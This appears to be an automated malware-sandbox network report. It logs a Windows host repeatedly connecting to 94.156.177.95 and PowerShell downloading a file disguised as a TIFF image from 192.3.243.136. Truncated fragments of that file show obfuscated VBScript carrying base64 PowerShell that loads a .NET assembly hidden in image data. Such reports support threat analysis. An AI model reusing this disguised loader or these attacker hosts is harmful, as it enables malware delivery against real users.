Nov 15, 2024 18:15:39.002080917 CET	49965	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:39.007797003 CET	80	49965	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:39.007873058 CET	49965	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:39.146599054 CET	49971	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:39.152496099 CET	80	49971	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:39.152576923 CET	49971	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:39.154721022 CET	49971	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:39.160283089 CET	80	49971	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:39.160355091 CET	49971	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:39.165970087 CET	80	49971	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:40.095613956 CET	80	49971	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:40.095783949 CET	49971	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:40.101073980 CET	80	49971	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:40.101157904 CET	49971	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:40.244827986 CET	49978	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:40.249761105 CET	80	49978	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:40.249866009 CET	49978	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:40.252780914 CET	49978	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:40.257673979 CET	80	49978	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:40.257744074 CET	49978	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:40.262660980 CET	80	49978	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:41.246045113 CET	80	49978	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:41.246344090 CET	49978	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:41.252279043 CET	80	49978	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:41.252468109 CET	49978	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:41.390011072 CET	49985	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:41.394961119 CET	80	49985	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:41.395042896 CET	49985	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:41.397134066 CET	49985	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:41.402314901 CET	80	49985	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:41.402378082 CET	49985	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:41.407305956 CET	80	49985	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:42.357958078 CET	80	49985	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:42.358174086 CET	49985	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:42.363348961 CET	80	49985	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:42.363455057 CET	49985	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:42.511058092 CET	49991	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:42.515870094 CET	80	49991	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:42.515990019 CET	49991	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:42.519032001 CET	49991	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:42.523947954 CET	80	49991	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:42.524039984 CET	49991	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:42.528822899 CET	80	49991	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:43.495873928 CET	80	49991	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:43.496053934 CET	49991	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:43.501297951 CET	80	49991	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:43.501354933 CET	49991	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:43.635874987 CET	49998	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:43.641011953 CET	80	49998	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:43.641093969 CET	49998	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:43.643137932 CET	49998	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:43.648040056 CET	80	49998	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:43.648108959 CET	49998	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:43.653095961 CET	80	49998	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:44.607532978 CET	80	49998	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:44.609400988 CET	49998	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:44.614598036 CET	80	49998	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:44.614732981 CET	49998	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:44.745280027 CET	50003	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:44.750324011 CET	80	50003	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:44.751250982 CET	50003	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:44.753181934 CET	50003	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:44.758002043 CET	80	50003	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:44.761342049 CET	50003	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:44.766223907 CET	80	50003	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:45.715318918 CET	80	50003	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:45.720876932 CET	50003	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:45.725987911 CET	80	50003	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:45.726058006 CET	50003	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:45.871941090 CET	50010	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:45.876799107 CET	80	50010	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:45.876921892 CET	50010	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:45.879076004 CET	50010	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:45.883858919 CET	80	50010	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:45.883898973 CET	50010	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:45.888776064 CET	80	50010	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:47.222376108 CET	80	50010	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:47.222538948 CET	50010	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:47.228182077 CET	80	50010	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:47.228260040 CET	50010	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:47.355736971 CET	50016	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:47.360826015 CET	80	50016	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:47.360965967 CET	50016	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:47.362961054 CET	50016	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:47.367861986 CET	80	50016	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:47.367954969 CET	50016	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:47.372833014 CET	80	50016	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:48.319152117 CET	80	50016	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:48.320341110 CET	50016	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:48.325705051 CET	80	50016	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:48.325784922 CET	50016	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:48.511102915 CET	50021	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:48.516047955 CET	80	50021	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:48.516138077 CET	50021	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:48.518177032 CET	50021	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:48.523111105 CET	80	50021	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:48.523171902 CET	50021	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:48.527973890 CET	80	50021	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:49.483989954 CET	80	50021	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:49.484132051 CET	50021	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:49.489768982 CET	80	50021	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:49.489847898 CET	50021	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:49.619949102 CET	50026	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:49.624797106 CET	80	50026	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:49.624871969 CET	50026	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:49.626610041 CET	50026	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:49.631448030 CET	80	50026	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:49.631500006 CET	50026	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:49.636300087 CET	80	50026	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:51.299175024 CET	80	50026	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:51.299264908 CET	50026	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:51.299652100 CET	80	50026	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:51.299684048 CET	80	50026	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:51.299700975 CET	50026	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:51.299716949 CET	50026	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:51.301553011 CET	80	50026	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:51.301599979 CET	50026	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:51.307216883 CET	80	50026	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:51.432840109 CET	50030	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:51.437870026 CET	80	50030	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:51.437956095 CET	50030	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:51.439925909 CET	50030	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:51.452116013 CET	80	50030	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:51.452173948 CET	50030	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:51.457056046 CET	80	50030	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:52.389782906 CET	80	50030	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:52.389939070 CET	50030	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:52.395416021 CET	80	50030	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:52.395499945 CET	50030	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:52.537261009 CET	50039	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:52.542306900 CET	80	50039	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:52.542402029 CET	50039	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:52.545501947 CET	50039	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:52.550590992 CET	80	50039	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:52.550654888 CET	50039	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:52.555526018 CET	80	50039	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:53.531023026 CET	80	50039	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:53.531119108 CET	50039	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:53.536573887 CET	80	50039	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:53.536644936 CET	50039	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:53.667660952 CET	50044	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:53.672853947 CET	80	50044	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:53.672950029 CET	50044	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:53.674910069 CET	50044	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:53.681334019 CET	80	50044	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:53.681411028 CET	50044	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:53.688611031 CET	80	50044	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:54.620743990 CET	80	50044	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:54.620846033 CET	50044	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:54.626383066 CET	80	50044	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:54.626533031 CET	50044	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:54.763283968 CET	50049	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:54.768280983 CET	80	50049	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:54.768385887 CET	50049	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:54.773739100 CET	50049	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:54.778541088 CET	80	50049	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:54.778594017 CET	50049	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:54.783451080 CET	80	50049	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:55.777123928 CET	80	50049	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:55.779442072 CET	50049	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:55.785103083 CET	80	50049	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:55.785170078 CET	50049	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:55.929631948 CET	50054	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:55.934623003 CET	80	50054	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:55.934705973 CET	50054	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:55.936876059 CET	50054	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:55.941725969 CET	80	50054	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:55.941776991 CET	50054	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:55.946705103 CET	80	50054	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:56.869158030 CET	80	50054	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:56.869262934 CET	50054	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:56.875612974 CET	80	50054	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:56.875664949 CET	50054	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:57.021110058 CET	50063	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:57.026913881 CET	80	50063	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:57.026994944 CET	50063	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:57.029602051 CET	50063	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:57.034526110 CET	80	50063	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:57.034588099 CET	50063	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:57.039397001 CET	80	50063	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:58.000564098 CET	80	50063	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:58.000787020 CET	50063	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:58.012600899 CET	80	50063	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:58.012686014 CET	50063	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:58.135967970 CET	50068	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:58.141138077 CET	80	50068	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:58.141226053 CET	50068	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:58.143311024 CET	50068	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:58.148207903 CET	80	50068	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:58.148279905 CET	50068	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:58.153141022 CET	80	50068	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:59.147363901 CET	80	50068	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:59.147535086 CET	50068	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:59.152769089 CET	80	50068	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:59.152832031 CET	50068	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:59.310003996 CET	50073	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:59.314872980 CET	80	50073	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:59.314955950 CET	50073	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:59.317055941 CET	50073	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:59.321930885 CET	80	50073	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:59.321995974 CET	50073	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:59.326833010 CET	80	50073	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:00.269982100 CET	80	50073	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:00.270107031 CET	50073	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:00.275401115 CET	80	50073	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:00.275469065 CET	50073	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:00.420578003 CET	50080	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:00.425457954 CET	80	50080	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:00.425563097 CET	50080	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:00.427676916 CET	50080	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:00.432533979 CET	80	50080	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:00.432593107 CET	50080	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:00.437413931 CET	80	50080	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:01.382997036 CET	80	50080	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:01.383166075 CET	50080	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:01.388475895 CET	80	50080	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:01.388547897 CET	50080	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:01.537725925 CET	50084	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:01.542752028 CET	80	50084	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:01.542829990 CET	50084	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:01.544954062 CET	50084	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:01.549794912 CET	80	50084	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:01.549900055 CET	50084	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:01.554800034 CET	80	50084	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:02.497056961 CET	80	50084	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:02.497178078 CET	50084	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:16:02.503490925 CET	80	50084	94.156.177.95	192.168.2.4
Nov 15, 2024 18:16:02.503554106 CET	50084	80	192.168.2.4	94.156.177.95

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 15, 2024 18:14:11.375248909 CET	54089	53	192.168.2.4	1.1.1.1
Nov 15, 2024 18:14:11.387165070 CET	53	54089	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 15, 2024 18:14:11.375248909 CET	192.168.2.4	1.1.1.1	0xcc5a	Standard query (0)	1017.filemail.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 15, 2024 18:14:11.387165070 CET	1.1.1.1	192.168.2.4	0xcc5a	No error (0)	1017.filemail.com	ip.1017.filemail.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 18:14:11.387165070 CET	1.1.1.1	192.168.2.4	0xcc5a	No error (0)	ip.1017.filemail.com		142.215.209.78	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

1017.filemail.com

192.3.243.136

94.156.177.95

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	192.3.243.136	80	6884	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:05.634198904 CET	334	OUT	GET /33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 192.3.243.136 Connection: Keep-Alive
Nov 15, 2024 18:14:06.301994085 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 17:14:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 15 Nov 2024 07:22:13 GMT ETag: "23014-626ee6d0c971b" Accept-Ranges: bytes Content-Length: 143380 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 73 00 6f 00 6e 00 61 00 6e 00 74 00 65 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 70 00 69 00 6f 00 63 00 61 00 6d 00 65 00 63 00 72 00 61 00 6e 00 73 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 78 00 61 00 6e 00 74 00 65 00 6c 00 6f 00 6d 00 61 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 72 00 65 00 63 00 61 00 74 00 61 00 64 00 61 00 6d 00 65 00 6e 00 74 00 65 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 70 00 69 00 72 00 6f 00 73 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 69 00 72 00 6f 00 73 00 65 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 70 00 69 00 6f 00 63 00 61 00 6d 00 65 00 63 00 72 00 61 00 6e 00 73 00 2c 00 20 00 78 00 61 00 6e 00 74 00 65 00 6c 00 6f 00 6d 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 70 00 69 00 72 00 6f 00 73 00 65 00 20 00 3e 00 [TRUNCATED] Data Ascii: Function sonante(ByVal piocamecrans, ByVal xanteloma, ByVal recatadamente) Dim pirose pirose = InStr(piocamecrans, xanteloma) Do While pirose > 0 piocamecrans = Left(piocamecrans, pirose - 1) & recatadamente & Mid(piocamecrans, pirose + Len(xanteloma)) pirose = InStr(pirose + Len(recatadamente), piocamecrans, xanteloma) Loop sonante = piocamecransEnd Functionprivate function ReadStdIn()
Nov 15, 2024 18:14:06.302083015 CET	1236	IN	Data Raw: 00 20 00 20 00 77 00 68 00 69 00 6c 00 65 00 20 00 4e 00 6f 00 74 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 41 00 74 00 45 00 6e 00 64 00 4f 00 66 00 53 00 74 00 72 00 65 00 61 00 6d 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 Data Ascii: while Not stdIn.AtEndOfStream ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functionIf Not mangan
Nov 15, 2024 18:14:06.302144051 CET	1236	IN	Data Raw: 00 50 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58 00 44 00 45 00 50 00 53 00 42 00 4f 00 5a 00 58 00 63 00 74 00 54 00 32 00 4a 00 71 00 5a 00 57 00 4e 00 30 00 49 00 46 00 4e 00 35 00 63 00 79 00 63 00 72 00 4a 00 33 Data Ascii: PJLACVWQNFKGXDEPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGJLACVWQNFKGXDEPltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQ
Nov 15, 2024 18:14:06.302314997 CET	636	IN	Data Raw: 00 4a 00 79 00 73 00 6e 00 59 00 57 00 63 00 70 00 4f 00 7a 00 4e 00 61 00 52 00 48 00 4e 00 30 00 59 00 58 00 4a 00 30 00 53 00 57 00 35 00 6b 00 5a 00 58 00 67 00 67 00 4c 00 57 00 64 00 6c 00 49 00 44 00 41 00 67 00 4c 00 57 00 46 00 75 00 5a Data Ascii: JysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJLACVWQNFKGXDEPJbmRleC" asfaltaria = asfaltaria & "AtJLACVWQN
Nov 15, 2024 18:14:06.302364111 CET	1236	IN	Data Raw: 00 4e 00 45 00 4e 00 76 00 62 00 57 00 31 00 68 00 62 00 6d 00 51 00 67 00 50 00 53 00 41 00 7a 00 57 00 6b 00 52 00 70 00 62 00 57 00 46 00 6e 00 5a 00 56 00 52 00 6c 00 65 00 48 00 51 00 75 00 55 00 33 00 56 00 69 00 63 00 33 00 52 00 79 00 61 Data Ascii: NENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaJLACVWQNFKGXDEPRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYJLACV
Nov 15, 2024 18:14:06.302418947 CET	1236	IN	Data Raw: 00 6d 00 62 00 47 00 55 00 6e 00 4b 00 79 00 64 00 6a 00 64 00 47 00 6c 00 76 00 62 00 69 00 35 00 42 00 63 00 33 00 4e 00 6c 00 62 00 57 00 4a 00 73 00 65 00 56 00 30 00 36 00 4f 00 6b 00 78 00 76 00 59 00 57 00 51 00 6f 00 4d 00 31 00 70 00 45 Data Ascii: mbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJLACVWQNFKGXDEPJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ
Nov 15, 2024 18:14:06.302470922 CET	1236	IN	Data Raw: 00 55 00 6e 00 4b 00 79 00 64 00 68 00 4c 00 45 00 6c 00 31 00 59 00 57 00 52 00 6c 00 63 00 32 00 46 00 30 00 61 00 58 00 5a 00 68 00 5a 00 47 00 39 00 4a 00 64 00 53 00 63 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58 Data Ascii: UnKydhLEl1YWRlc2F0aXZhZG9JdScJLACVWQNFKGXDEPrJ2EsSX" asfaltaria = asfaltaria & "VhJLACVWQNFKGXDEPZGVzYXRpdmFkb0l
Nov 15, 2024 18:14:06.302521944 CET	1236	IN	Data Raw: 00 66 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 26 00 20 00 22 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58 00 44 00 45 00 50 00 64 00 69 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58 Data Ascii: follipar & "JLACVWQNFKGXDEPdiJLACVWQNFKGXDEP" enfollipar = enfollipar & "gJLACVWQNFKGXDEPo JLACVWQNFKGXDEP"
Nov 15, 2024 18:14:06.302995920 CET	848	IN	Data Raw: 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 66 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 66 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 26 00 20 00 22 00 2e 00 4a 00 4c 00 41 00 43 Data Ascii: enfollipar = enfollipar & ".JLACVWQNFKGXDEPTeJLACVWQNFKGXDEP" enfollipar = enfollipar & "xJLACVWQNFKGXD
Nov 15, 2024 18:14:06.303050995 CET	1236	IN	Data Raw: 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 66 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 26 00 20 00 22 00 46 00 38 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58 00 44 00 45 00 50 Data Ascii: ollipar = enfollipar & "F8JLACVWQNFKGXDEP." enfollipar = enfollipar & "GeJLACVWQNFKGXDEPt" enfollipar =
